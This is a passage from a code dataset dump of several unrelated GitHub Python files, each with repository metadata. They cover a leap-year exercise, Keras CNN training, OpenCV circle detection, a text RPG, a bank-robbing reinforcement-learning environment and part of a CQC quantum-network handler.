\n2000\n예제 출력 1 \n1\n예제 입력 2 \n1999\n예제 출력 2 \n0\n\n\n'''\ndef judge(luna) :\n if (luna%4==0 and luna % 100 !=0) or luna % 400 ==0: return 1 \n return 0\n\nluna = int(input())\n\nprint(judge(luna))\n","repo_name":"2023cote/2022cote_eunseo","sub_path":"implementation/02_2753.py","file_name":"02_2753.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21963110640","text":"from util import *\n\n\ndef define_model(conv_layer_count: int, inflation_type: str, conv_kernel_size: int) -> tf.keras.Model:\n \"\"\"\n define and compile a keras model based on the given parameters\n :param conv_layer_count: number of convolutional layers, including input layer\n :param inflation_type: the distribution of neurons over the model: one of\n 'inflating': starting with 4 neurons in input layer, every subsequent layer has 4 additional neurons\n 'deflating': every subsequent layer has 4 neurons less than the preceding layer, ending with 4 neurons in the\n layer immediately before the final dense layer\n the final dense layer always has 1 neuron.\n :param conv_kernel_size: size of the kernel of all convolutional layers\n :return: the compiled model\n \"\"\"\n\n filter_count = 4 if inflation_type == \"deflating\" else 1\n\n # model definition\n model = tf.keras.models.Sequential()\n\n if conv_layer_count > 0:\n\n # input layer\n model.add(tf.keras.layers.Conv2D(filters=filter_count, kernel_size=conv_kernel_size,\n input_shape=(cnn_input_grid_size, cnn_input_grid_size, 1), activation=\"relu\"))\n\n # hidden layers\n for _ in range(conv_layer_count - 1):\n # update filter count according to mode\n filter_count = filter_count // 2 if inflation_type == \"deflating\" else filter_count * 2\n # add additional conv layer\n model.add(tf.keras.layers.Conv2D(filters=filter_count, kernel_size=conv_kernel_size, activation=\"relu\"))\n\n model.add(tf.keras.layers.Flatten())\n\n else:\n # input layer\n model.add(tf.keras.layers.Flatten(input_shape=(cnn_input_grid_size, cnn_input_grid_size, 1)))\n\n # last hidden layer\n model.add(tf.keras.layers.Dense(4 if inflation_type == \"deflating\" else 16, activation=\"relu\"))\n\n # output layer\n model.add(tf.keras.layers.Dense(1))\n\n # compile model and print structural info\n model.compile(loss=loss_function, optimizer=optimizer_choice, metrics=[loss_function])\n model.summary()\n\n return model\n\n\ndef train_model(model: tf.keras.Model, basepath: str) -> tf.keras.Model:\n \"\"\"\n trains the given model with early stopping, saving tensorboard logs in the given directory\n :param model: the model to train\n :param basepath: directory to save the tensorboard logs and the checkpoints in\n :return: the trained model\n \"\"\"\n\n run_logdir = os.path.abspath(os.path.join(basepath, \"logs\"))\n # initialize tensorboard with log directory\n tensorboard_cb = tf.keras.callbacks.TensorBoard(run_logdir, histogram_freq=1)\n\n # define early stopping and checkpointing callbacks\n es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=early_stopping_patience)\n checkpoint_filepath = os.path.abspath(os.path.join(basepath, 'best_model.h5'))\n mc = tf.keras.callbacks.ModelCheckpoint(\n checkpoint_filepath,\n monitor='val_loss', mode='min', verbose=1, save_weights_only=True, save_best_only=True\n )\n\n # prepare train and evaluation data generators\n training_dataset = get_dataset(os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[0]), batch_size)\n validation_dataset = get_dataset(os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[1]), batch_size)\n\n # train the model\n model.fit(x=training_dataset, validation_data=validation_dataset, epochs=epochs,\n steps_per_epoch=train_dataset_size, validation_steps=val_dataset_size,\n callbacks=[tensorboard_cb, es, mc])\n\n # restore weights of best checkpoint\n model.load_weights(checkpoint_filepath)\n\n return model\n\n\ndef train_one_model_variant(conv_layer_count, inflation_type, conv_kernel_size):\n \"\"\"\n creates a model based on teh given parameters and trains it, saving it to disk\n :param conv_layer_count: number of convolutional layers\n :param inflation_type: the distribution of neurons over the model: one of\n 'inflating': starting with 4 neurons in input layer, every subsequent layer has 4 additional neurons\n 'deflating': every subsequent layer has 4 neurons less than the preceding layer, ending with 4 neurons in the\n layer immediately before the final dense layer\n the final dense layer always has 1 neuron.\n :param conv_kernel_size: size of the kernel of all convolutional layers\n :return: nothing, modifies filesystem\n \"\"\"\n print(\"\\n\\n\\ntraining model '{}_conv_layers_{}_kernel_size_{}'\\n\\n\\n\".format(\n conv_layer_count, inflation_type, conv_kernel_size\n ))\n # define teh model\n current_model = define_model(conv_layer_count, inflation_type, conv_kernel_size)\n # prepare path to save model and logs/plots\n current_basepath = os.path.abspath(\n \"./models/conv/{}_conv_layers_{}_kernel_size_{}\".format(\n conv_layer_count, inflation_type, conv_kernel_size\n )\n )\n # train the model\n current_model = train_model(current_model, current_basepath)\n # save the model to disk for deployment\n current_model.save(os.path.abspath(os.path.join(current_basepath, \"model\")), include_optimizer=False)\n\n\nconv_layer_counts = [2, 1, 0]\nconv_kernel_sizes = [7, 3]\ninflation_types = [\"inflating\", \"deflating\"]\n\nif __name__ == \"__main__\":\n # load train data characteristics\n with open(\n os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[0]) + \"characteristics.txt\", \"r\"\n ) as input_file:\n train_dataset_size = int(input_file.readline().split(\" \")[0])\n print(\"size of training set: {} samples\".format(train_dataset_size))\n max_grid_size = int(input_file.readline().split(\" \")[0])\n print(\"maximum occurring BB size: {}x{}\".format(max_grid_size, max_grid_size))\n\n # load validation data characteristics\n with open(\n os.path.join(tfrecord_basepath, TRAIN_VAL_TEST_DESCRIPTORS[1]) + \"characteristics.txt\", \"r\"\n ) as input_file:\n val_dataset_size = int(input_file.readline().split(\" \")[0])\n print(\"size of validation set: {} samples\".format(val_dataset_size))\n\n # HPO loop (grid search over few points because of long runtime)\n for current_conv_layer_count in conv_layer_counts:\n for current_inflation_type in inflation_types:\n if current_conv_layer_count > 0:\n for current_conv_kernel_size in conv_kernel_sizes:\n train_one_model_variant(current_conv_layer_count, current_inflation_type, current_conv_kernel_size)\n else:\n train_one_model_variant(current_conv_layer_count, current_inflation_type, -1)\n\n","repo_name":"TrellixVulnTeam/Bachelor_Arbeit_TD4S","sub_path":"NeuronalNetworks/combined_project/train_model_conv.py","file_name":"train_model_conv.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27710779937","text":"from fletcherfiltering.common.data_generation.BaseGenerator import BaseGenerator\nimport lipsum\nfrom fletcherfiltering import settings\nimport random\n\nclass SentenceGenerator(BaseGenerator):\n\n def generate(self, maxlength: int = settings.VAR_LENGTH) -> str:\n if random.random() < settings.EMPTYSTRINGPROBABILITY:\n return \"\"\n sentence = lipsum.generate_sentences(1)\n if len(sentence) > maxlength:\n indexes = [pos for pos, char in enumerate(sentence) if char == ' ' and pos < maxlength]\n if len(indexes) == 0:\n sentence = sentence[:maxlength]\n else:\n sentence = sentence[:indexes[-1]]\n return sentence\n","repo_name":"abs-tudelft/FletcherFiltering","sub_path":"src/fletcherfiltering/common/data_generation/SentenceGenerator.py","file_name":"SentenceGenerator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35597905490","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport tkinter as tk\nfrom tkinter import *\nimport time\nimport math\n\nyellowLower=(29,127,121)\nyellowHigher=(179,255,255)\n\ndef isclose(a,b,maxi):\n if a <= b+maxi and a>=b-maxi:\n return True\n else:\n return False\n\ncap = cv2.VideoCapture(\"data/video2.webm\")\ncircles = []\n\n#inimg = cv2.imread(\"data/salle2.jpg\")\n\n#h = int(inimg.shape[0]/2)\n#w = int(inimg.shape[1]/2)\n#dim = (w,h)\n\n#inimg = cv2.resize(inimg,dim,interpolation=cv2.INTER_AREA)\n\nprevCenter = (0,0)\n\nwhile True:\n\n ret, inimg = cap.read()\n if not ret:\n print(\"error reading video\")\n break\n\n ############################ Circles detection\n\n # Convert to grayscale.\n gray = cv2.cvtColor(inimg, cv2.COLOR_BGR2GRAY)\n # Blur using 3 * 3 kernel.\n gray_blurred = cv2.blur(gray, (3, 3))\n detected_circles = cv2.HoughCircles(gray_blurred, cv2.HOUGH_GRADIENT, 1, 20, param1 = 50, param2 = 30, minRadius = 1, maxRadius = 40)\n\n # only proceed if at least one circle was found\n if detected_circles is not None:\n # Convert the circle parameters a, b and r to integers.\n detected_circles = np.uint16(np.around(detected_circles))\n # store the circles in an array for later\n for pt in detected_circles[0, :]:\n a, b, r = pt[0], pt[1], pt[2]\n cv2.circle(inimg, (a, b), r, (0, 255, 0), 2)\n \n cv2.imshow(\"circles\",inimg)\n #time.sleep(0.03)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","repo_name":"Theophile-Wemaere/ball_tracking_cv2","sub_path":"circle_detection.py","file_name":"circle_detection.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23936623762","text":"'''\nCreated on Jan 6, 2016\n\n@author: T0157129\n'''\nimport logging\nimport logging.config\n\n\nfrom Characters.Player import Player\nfrom Prefabs.WorldItems import WorldItems\nfrom Prefabs.EnemyGenerator import EnemyGenerator\nfrom Printer import Printer\nfrom Stories.Story import Story\n\nfrom Utilities import XmlParser as xmlp\nfrom Utilities import UserInteract as ui\nfrom Utilities import Caster as cast\n\n\nimport xml.dom.minidom as minidom\n\n\nclass Game:\n '''\n This class represents the whole game.\n \n '''\n\n\n def __init__(self):\n '''\n Constructor\n '''\n# logging.basicConfig(level=logging.DEBUG, disable_existing_loggers=False)\n# self.logger = logging.getLogger(__name__)\n \n self.gameOver= False\n \n \n self.printer=Printer(self)\n \n self.WI= WorldItems()\n \n self.player = self.__initPlayer()\n \n \n # Enemies\n self.EG = EnemyGenerator(self.WI)\n \n self.currentEnemy= \"\"\n \n \n self.story = Story( self)\n \n self.printer.intro(self.player)\n self.player.listInventory()\n raw_input()\n \n self.nbTurn = 0\n \n print(\"##################################################\")\n print(\" THE GAME BEGINS\")\n print(\"##################################################\")\n \n self.nextEvent = self.story.goToEvent(\"intro\")\n \n \n '''\n void onTurn()\n ''' \n def onTurn(self):\n self.nbTurn = self.nbTurn +1\n \n self.nextEvent = self.story.goToEvent(self.nextEvent)\n \n \n \n '''\n boolean onGame()\n Return true while the player isn't dead.\n ''' \n def onGame(self):\n return self.player.isAlive() and self.nbTurn<20\n \n \n def endGame(self):\n print(\"##################################################\")\n print(\" THE GAME ENDS\")\n print(\"##################################################\")\n self.gameOver= True\n \n def isGameOver(self):\n return self.gameOver\n \n \n '''\n Return a player object.\n '''\n def __initPlayer(self):\n \n dictMode={} #will contains all information about each game mode\n file = minidom.parse(\"./XML_Files/InitPlayer.xml\")\n modes = file.getElementsByTagName(\"DifficultyMode\")\n for mode in modes:\n data= xmlp.parseAttributes(mode) \n dictMode[data.get('id')]= data\n \n #Ask the player which mode does he wants to play\n ToPrint=\"Difficulty Modes: \"\n for mode in dictMode.keys():\n ToPrint= ToPrint + ' ' + mode\n \n print(ToPrint)\n \n #Parse the user input\n userMode = ui.userIput(\"Which mode do you want to play? \", dictMode.keys())\n SelectedMode = dictMode[userMode]\n \n ## Parse the mode's parameters\n player = Player(SelectedMode.get('hp'))\n \n armorName =SelectedMode.get('armor') \n if armorName is None:\n player.equipArmor(self.WI.getArmorByCategory(\"basic\"))\n else:\n player.equipArmor(self.WI.getArmor(armorName))\n \n weaponName = SelectedMode.get('weapon')\n if weaponName is None:\n player.equipWeapon(self.WI.getWeaponByCategory(\"basic\"))\n else:\n player.equipWeapon(self.WI.getWeapon(weaponName))\n \n potion = self.WI.getPotionByCategory(\"HP\")\n if SelectedMode.get('potion') is not None:\n if cast.strToBool(SelectedMode.get('potion')): \n potion.fill()\n player.addToBag(potion)\n \n return player","repo_name":"vyrval/GYATH","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37159063307","text":"''' Class for Bank environment. '''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython import display\nfrom random import choice\nimport time\nfrom copy import deepcopy\nfrom itertools import product\n\n# Some colours\nLIGHT_RED = '#FFC4CC'\nLIGHT_GREEN = '#95FD99'\nBLACK = '#000000'\nWHITE = '#FFFFFF'\nLIGHT_PURPLE = '#E8D0FF'\nLIGHT_ORANGE = '#FAE0C3'\n\n\nclass Bank:\n\n # Actions\n STAY = 0\n MOVE_LEFT = 1\n MOVE_RIGHT = 2\n MOVE_UP = 3\n MOVE_DOWN = 4\n\n # Give names to actions\n actions_names = {\n STAY: \"stay\",\n MOVE_LEFT: \"move left\",\n MOVE_RIGHT: \"move right\",\n MOVE_UP: \"move up\",\n MOVE_DOWN: \"move down\"\n }\n\n # Reward values\n IN_BANK_REWARD = 1\n IMPOSSIBLE_REWARD = -100\n CAUGHT_REWARD = -10\n\n\n def __init__(self, grid):\n \"\"\" Constructor of the environment Bank (and town).\n \"\"\"\n # Town attributes\n self.grid = grid\n self.start = tuple(np.argwhere(grid == 1).reshape(1,-1)[0])\n self.money = tuple(np.argwhere(grid == 3).reshape(1, -1)[0])\n self.coords = [(x, y) for x, y in np.ndindex(self.grid.shape)]\n # Robber attributes\n self.caught = False\n self.actions = self.__actions()\n self.n_actions = len(self.actions)\n self.id2states, self.states2id = self.__states()\n self.n_states = len(self.id2states)\n # Police attributes\n self.e_start = tuple(np.argwhere(grid == 2).reshape(1, -1)[0])\n self.e_actions = self.__enemyActions()\n self.e_id2states, self.e_states2id = self.__enemyStates()\n self.e_n_states = len(self.e_id2states)\n # Joint states\n self.id2jointStates, self.jointStates2id = self.__jointStates()\n self.n_jointStates = len(self.id2jointStates)\n # We are oblivious to the good / bad states at first\n # Losing states are those when player pos == police pos\n self.losingStates = self.__losingStates()\n self.winningStates = []\n\n def __actions(self):\n actions = dict()\n actions[self.STAY] = (0, 0)\n actions[self.MOVE_LEFT] = (0,-1)\n actions[self.MOVE_RIGHT] = (0, 1)\n actions[self.MOVE_UP] = (-1,0)\n actions[self.MOVE_DOWN] = (1,0)\n return actions\n\n def __states(self):\n coords = [(i, (x, y)) for i, (x, y) in enumerate(np.ndindex(self.grid.shape))]\n # Mapping from index state to x,y coordinates\n id2states = dict([(i, s) for i, s in (coords)])\n # Invert mapping from coordinates to index\n states2id = {v: k for k, v in id2states.items()}\n return id2states, states2id\n\n def __losingStates(self):\n # Get indexes of states that are at the same position\n idx = set([i for i, A in enumerate(\n self.id2jointStates.values()) if A[0] == A[1]])\n return idx\n\n def __enemyStates(self):\n id2states = dict([(i, s) for i, s in enumerate(self.coords)])\n states2id = {v: k for k, v in id2states.items()}\n return id2states, states2id\n \n def __enemyActions(self):\n e_actions = deepcopy(self.actions)\n # Enemy not allowed to stay\n del e_actions[0]\n return e_actions\n\n def __e_possibleMoves(self, position):\n possible_act = []\n for idx, action in self.e_actions.items():\n row = position[0] + action[0]\n col = position[1] + action[1]\n hitting_maze_walls = (row == -1) or (row == self.grid.shape[0]) or \\\n (col == -1) or (col == self.grid.shape[1])\n if not hitting_maze_walls:\n possible_act.append(idx)\n return possible_act\n\n def __jointStates(self):\n id2jointStates = dict([(i, s) for i, s in \\\n enumerate(product(self.states2id.keys(), self.e_states2id.keys()))])\n jointStates2id = {v: k for k, v in id2jointStates.items()}\n # [(a,b) for a, b in product(self.id2states.keys(), self.e_id2states.keys())]\n return id2jointStates, jointStates2id\n\n def __move(self, state, action=None):\n \"\"\" Makes a step in the grid, given a current position and an action.\n If the action STAY or an inadmissible action is used, the agent stays in place.\n :return tuple next_cell: Position (x,y) on the grid that agent transitions to.\n \"\"\"\n # Random action\n if action == None:\n action = choice(list(self.actions.keys()))\n # Compute the future position given current (state, action)\n row = state[0] + self.actions[action][0]\n col = state[1] + self.actions[action][1]\n # Is the future position an impossible one ?\n hitting_maze_walls = (row == -1) or (row == self.grid.shape[0]) or \\\n (col == -1) or (col == self.grid.shape[1])\n # Return both (x,y) and index state\n if hitting_maze_walls:\n return state, self.states2id[state]\n else:\n return (row, col), self.states2id[(row, col)]\n\n def __e_move(self, state, action=None):\n \"\"\" Makes a step in the grid, given a current position and an action.\n If the action STAY or an inadmissible action is used, the agent stays in place.\n :return tuple next_cell: Position (x,y) on the grid that agent transitions to.\n \"\"\"\n # Random action\n if action == None:\n action = choice(list(self.e_actions.keys()))\n # Compute the future position given current (state, action)\n row = state[0] + self.e_actions[action][0]\n col = state[1] + self.e_actions[action][1]\n # Is the future position an impossible one ?\n outside_maze = (row == -1) or (row == self.grid.shape[0]) or \\\n (col == -1) or (col == self.grid.shape[1])\n # Based on the impossiblity check return the next state.\n while outside_maze:\n # The enemy cannot choose a wrong position. Try another one.\n action = choice(list(self.e_actions.keys()))\n row = state[0] + self.e_actions[action][0]\n col = state[1] + self.e_actions[action][1]\n outside_maze = (row == -1) or (row == self.grid.shape[0]) or \\\n (col == -1) or (col == self.grid.shape[1])\n # return np.ravel_multi_index((row, col), dims=self.grid.shape)\n return (row, col), self.e_states2id[(row, col)]\n\n\n def simulate(self, policy, tlimit, player=None, police=None):\n\n path, path_enemy = [], []\n t = 0\n\n if player == None:\n s, _ = self.start, self.states2id[self.start]\n else:\n s, _ = player, self.states2id[player]\n if police == None:\n e_s, _ = self.e_start, self.e_states2id[self.e_start]\n else:\n e_s, _ = police, self.e_states2id[police]\n\n # Add the starting position in the grid to the path\n path.append(s)\n path_enemy.append(e_s)\n\n while t < tlimit-1 and not self.caught:\n\n i = self.jointStates2id[(s, e_s)]\n # Move to next state given the policy and the current state\n next_s, _ = self.__move(s, policy[i])\n path.append(next_s)\n # Move enemy\n next_e_s, _ = self.__e_move(e_s)\n path_enemy.append(next_e_s)\n\n if next_s == next_e_s:\n self.caught = True\n # Add again paths for the vizualization function\n path.append(next_s)\n path_enemy.append(next_e_s)\n\n # Update time and state for next iteration\n t +=1\n s = next_s\n e_s = next_e_s\n\n return path, path_enemy\n\n def show(self):\n print('The states are :')\n print(self.id2states)\n print('The actions are:')\n print(self.actions)\n print('The mapping of the states:')\n print(self.states2id)\n # print('The rewards:')\n # print(self.R)\n\n\ndef draw_maze(grid):\n\n # Mapp a color to each cell in the grid\n col_mapp = {0: WHITE, 1: BLACK,\n 2: LIGHT_GREEN, 3: LIGHT_ORANGE, -1: LIGHT_RED}\n\n # Give a color to each cell\n rows, cols = grid.shape\n colored_maze = [[col_mapp[grid[j, i]]\n for i in range(cols)] for j in range(rows)]\n\n # Create figure of the size of the grid\n fig = plt.figure(1, figsize=(cols, rows))\n\n # Remove the axis ticks and add title title\n ax = plt.gca()\n ax.set_title('The Maze')\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Create a table to color\n grid = plt.table(cellText=None,\n cellColours=colored_maze,\n cellLoc='center',\n loc=(0, 0),\n edges='closed')\n # Modify the hight and width of the cells in the table\n tc = grid.properties()['child_artists']\n for cell in tc:\n cell.set_height(1.0/rows)\n cell.set_width(1.0/cols)\n\n\ndef animate_solution(grid, path, path_enemy=None):\n\n # Mapp a color to each cell in the grid\n col_mapp = {0: WHITE, 1: BLACK,\n 2: LIGHT_GREEN, 3: LIGHT_ORANGE, -1: LIGHT_RED}\n\n # Size of the grid\n rows, cols = grid.shape\n\n # Create figure of the size of the grid\n fig = plt.figure(1, figsize=(cols, rows))\n\n # Remove the axis ticks and add title title\n ax = plt.gca()\n ax.set_title('Policy simulation')\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Give a color to each cell\n colored_maze = [[col_mapp[grid[j, i]]\n for i in range(cols)] for j in range(rows)]\n\n # Create a table to color\n grid = plt.table(cellText=None,\n cellColours=colored_maze,\n cellLoc='center',\n loc=(0, 0),\n edges='closed')\n\n # Modify the hight and width of the cells in the table\n tc = grid.properties()['child_artists']\n for cell in tc:\n cell.set_height(1.0/rows)\n cell.set_width(1.0/cols)\n\n # Update the color at each frame\n for i in range(len(path)):\n grid.get_celld()[(path[i])].set_facecolor(LIGHT_GREEN)\n grid.get_celld()[(path[i])].get_text().set_text('Robber')\n grid.get_celld()[(path_enemy[i])].set_facecolor(LIGHT_RED)\n grid.get_celld()[(path_enemy[i])].get_text().set_text('Police')\n if i > 0:\n # Re-initialize previous cells\n grid.get_celld()[(path[i-1])].set_facecolor(WHITE)\n grid.get_celld()[(path[i-1])].get_text().set_text('')\n grid.get_celld()[(path_enemy[i-1])].set_facecolor(WHITE)\n grid.get_celld()[(path_enemy[i-1])].get_text().set_text('')\n\n # if waiting but no the end of the path\n if path[i] == path[i-1]:\n if i != len(path)-1:\n grid.get_celld()[(path[i])].set_facecolor(LIGHT_PURPLE)\n grid.get_celld()[(path[i])].get_text().set_text(\n 'Stealing')\n else:\n grid.get_celld()[(path[i])].set_facecolor(LIGHT_GREEN)\n grid.get_celld()[(path[i])].get_text().set_text(\n 'Win !')\n break\n\n if path[i] == path_enemy[i]:\n grid.get_celld()[(path[i])].set_facecolor(LIGHT_RED)\n grid.get_celld()[(path[i])].get_text().set_text('Caught !')\n break\n\n display.display(fig)\n display.clear_output(wait=True)\n time.sleep(1)\n","repo_name":"matheusoliveirafranca/Reinforcement-Learning","sub_path":"Bank Robbing/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":11635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27322220101","text":"import abc\nimport math\nimport logging\nimport warnings\nfrom typing import Any, List\nfrom itertools import count\n\nfrom cqc.cqcHeader import (\n CQC_VERSION,\n CQC_TP_COMMAND,\n CQC_TP_GET_TIME,\n CQC_TP_HELLO,\n CQC_TP_DONE,\n CQC_TP_NEW_OK,\n CQC_TP_RECV,\n CQC_TP_EPR_OK,\n CQC_TP_MEASOUT,\n CQC_TP_EXPIRE,\n CQC_TP_INF_TIME,\n CQC_ERR_GENERAL,\n CQC_ERR_NOQUBIT,\n CQC_ERR_UNSUPP,\n CQC_ERR_TIMEOUT,\n CQC_ERR_UNKNOWN,\n CQC_CMD_NEW,\n CQC_CMD_SEND,\n CQC_CMD_EPR,\n CQC_CMD_CNOT,\n CQC_CMD_CPHASE,\n CQC_CMD_ROT_X,\n CQC_CMD_ROT_Y,\n CQC_CMD_ROT_Z,\n CQC_CMD_MEASURE,\n CQC_CMD_MEASURE_INPLACE,\n CQC_CMD_RECV,\n CQC_CMD_EPR_RECV,\n CQC_CMD_ALLOCATE,\n CQC_TP_FACTORY,\n Header,\n CQCHeader,\n CQCCmdHeader,\n CQCTypeHeader,\n CQCAssignHeader,\n CQCFactoryHeader,\n CQCRotationHeader,\n CQCXtraQubitHeader,\n CQCCommunicationHeader,\n CQCType,\n)\nfrom .util import (\n CQCUnsuppError,\n CQCGeneralError,\n CQCNoQubitError,\n CQCTimeoutError,\n CQCUnknownError,\n ProgressBar,\n)\nfrom .qubit import qubit\n\n\nclass CQCHandler(abc.ABC):\n \"\"\"This class defines the things any CQCHandler must do.\n\n It is to be subclassed by the various actual classes that handle CQC, such\n as CQCConnection and CQCToFile.\n \"\"\"\n\n _appIDs = {}\n\n def __init__(self, name, app_id=None, pend_messages=False, notify=True):\n\n self.name = name\n\n # This flag is used to check if CQCConnection is opened using a 'with' statement.\n # Otherwise an deprecation warning is printed when instantiating qubits.\n self._opened_with_with = False\n\n # Set an app ID\n self._appID = self._get_new_app_id(app_id)\n\n # This is a sort of global notify\n self.notify = notify\n\n # All qubits active for this connection\n self.active_qubits = []\n\n # List of pended header objects waiting to be sent to the backend\n self._pending_headers = [] # ONLY cqc.cqcHeader.Header objects should be in this list\n\n # Bool that indicates whether we are in a factory and thus should pend commands\n self.pend_messages = pend_messages\n\n # Keep track of pending messages\n self._pending_headers = []\n\n @property\n def pend_messages(self):\n return self._pend_messages\n\n @pend_messages.setter\n def pend_messages(self, value):\n self.set_pending(value)\n\n def __str__(self):\n return \"CQC handler for node '{}'\".format(self.name)\n\n def _get_new_app_id(self, app_id):\n \"\"\"Finds a new app ID if not specific\"\"\"\n name = self.name\n if name not in self._appIDs:\n self._appIDs[name] = []\n\n # Which appID\n if app_id is None:\n for app_id in count(0):\n if app_id not in self._appIDs[name]:\n self._appIDs[name].append(app_id)\n return app_id\n else:\n if app_id in self._appIDs[name]:\n raise ValueError(\"appID={} is already in use\".format(app_id))\n self._appIDs[name].append(app_id)\n return app_id\n\n def __enter__(self):\n # This flag is used to check if CQCHandler is opened using a \n # 'with' statement.\n # Otherwise an deprecation warning is printed when instantiating\n # qubits.\n self._opened_with_with = True\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n # All qubits should now be released\n self.close(release_qubits=True)\n\n @abc.abstractmethod\n def new_qubitID(self, print_cqc=False):\n \"\"\"Provide new qubit ID.\n \n This method must provide the new qubit ID. This qubit ID could \n be given by the server you are communicating with, or it might\n simply be a number that increases by one every time the method\n is used. This will depend on the type of CQCHandler being used.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_create_qubits(self, num_qubits, notify):\n \"\"\"Handles responses after allocating qubits and returns a list of qubits\"\"\"\n pass\n\n @abc.abstractmethod\n def return_meas_outcome(self):\n \"\"\"Return measurement outcome.\"\"\"\n pass\n\n @abc.abstractmethod\n def commit(self, msg):\n \"\"\"Commit a message. \n\n This can mean sending it to the backend or just writing to file.\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_factory_response(self, num_iter, response_amount, should_notify=False):\n \"\"\"Handles the responses from a factory command and returns a list of results\"\"\"\n pass\n\n @abc.abstractmethod\n def get_remote_from_directory_or_address(self, name, **kwargs):\n \"\"\"Returns the remote address of a given node\"\"\"\n pass\n\n @abc.abstractmethod\n def _handle_epr_response(self, notify):\n \"\"\"Waits for and handles the response message and returns a qubit object.\"\"\"\n pass\n\n @abc.abstractmethod\n def readMessage(self):\n \"\"\"Receive the whole message from cqc server.\n\n Returns (CQCHeader,None,None), (CQCHeader,CQCNotifyHeader,None) \n or (CQCHeader,CQCNotifyHeader,EntInfoHeader) depending on the \n type of message.\n \"\"\"\n pass\n\n def get_appID(self):\n \"\"\"Returns the application ID.\"\"\"\n\n return self._appID\n\n def commit_command(self, qID, command, notify=1, block=1, action=0, \n xtra_qID=0, step=0, remote_appID=0, remote_node=0, \n remote_port=0, ref_id=0):\n \"\"\"Construct and commit command.\"\"\"\n\n headers = self.construct_command_headers(\n qID, command, notify=notify, block=block, action=action, \n xtra_qID=xtra_qID, step=step, remote_appID=remote_appID, \n remote_node=remote_node, remote_port=remote_port, ref_id=ref_id)\n self.commit_headers(headers)\n\n def commit_headers(self, headers):\n \"\"\"Packs a list of headers and commits the message\"\"\"\n msg = b''\n for header in headers:\n msg += header.pack()\n self.commit(msg)\n\n def put_command(self, qID, command, read_notify=True, **kwargs):\n \"\"\"Puts a new command to be executed.\n\n If self.pend_messages is set to True, the messages are kept until flushing,\n otherwise they are commited directly.\n\n Parameters\n ----------\n qID: int\n Id of the qubit to apply the command on\n command: int\n What command to be executed\n read_notify : bool\n Whether to listen to a notify message in this function or if this is handled\n elsewhere (e.g. createEPR)\n \"\"\"\n headers = self.construct_command_headers(qID=qID, command=command, **kwargs)\n str_of_headers = \"\".join([\"\\t{}\\n\".format(header) for header in headers])\n if self.pend_messages:\n headers = self._update_headers_before_pending(headers)\n logging.debug(\"App {} pends a command with headers:\\n{}\".format(\n self.name,\n str_of_headers,\n ))\n self.pend_headers(headers)\n else:\n logging.debug(\"App {} sends a command with headers:\\n{}\".format(\n self.name,\n str_of_headers,\n ))\n self.commit_headers(headers)\n if read_notify:\n notify = kwargs.get(\"notify\", True)\n if notify:\n message = self.readMessage()\n self._assert_done_message(message)\n self.print_CQC_msg(message)\n\n def _update_headers_before_pending(self, headers):\n # Don't include the CQC Headers since this is a sequence\n return headers[1:]\n\n def _assert_done_message(self, message):\n if message[0].tp != CQC_TP_DONE:\n raise CQCUnsuppError(\n \"Unexpected message sent back from the server. Message: {}\".format(message[0])\n )\n\n def pend_headers(self, headers):\n \"\"\"Pends the given headers\"\"\"\n for header in headers:\n self.pend_header(header)\n \n def pend_header(self, header: Header) -> None:\n self._pending_headers.append(header)\n\n def construct_command(self, qID, command, **kwargs):\n \"\"\"Construct a commmand and packs it in it's binary form.\n\n Extra arguments are only used if the command if of a type that \n needs them.\n\n - **Arguments**\n\n :qID: qubit ID\n :command: Command to be executed, eg CQC_CMD_H\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n headers = self.construct_command_headers(qID, command, **kwargs)\n msg = b''\n for header in headers:\n msg += header.pack()\n return msg\n\n def construct_command_headers(self, qID, command, **kwargs):\n \"\"\"Construct a commmand consisting of a list of header objects.\n\n Extra arguments are only used if the command if of a type that \n needs them.\n\n - **Arguments**\n\n :qID: qubit ID\n :command: Command to be executed, eg CQC_CMD_H\n :nofify: Do we wish to be notified when done.\n :block: Do we want the qubit to be blocked\n \"\"\"\n # Construct extra header if needed.\n xtra_hdr = None\n if command == CQC_CMD_SEND or command == CQC_CMD_EPR:\n xtra_hdr = CQCCommunicationHeader()\n remote_appID = kwargs.get(\"remote_appID\", 0)\n remote_node = kwargs.get(\"remote_node\", 0)\n remote_port = kwargs.get(\"remote_port\", 0)\n xtra_hdr.setVals(remote_appID, remote_node, remote_port)\n elif command == CQC_CMD_CNOT or command == CQC_CMD_CPHASE:\n xtra_hdr = CQCXtraQubitHeader()\n xtra_qID = kwargs.get(\"xtra_qID\", 0)\n xtra_hdr.setVals(xtra_qID)\n elif (command == CQC_CMD_ROT_X or command == CQC_CMD_ROT_Y \n or command == CQC_CMD_ROT_Z):\n xtra_hdr = CQCRotationHeader()\n step = kwargs.get(\"step\", 0)\n 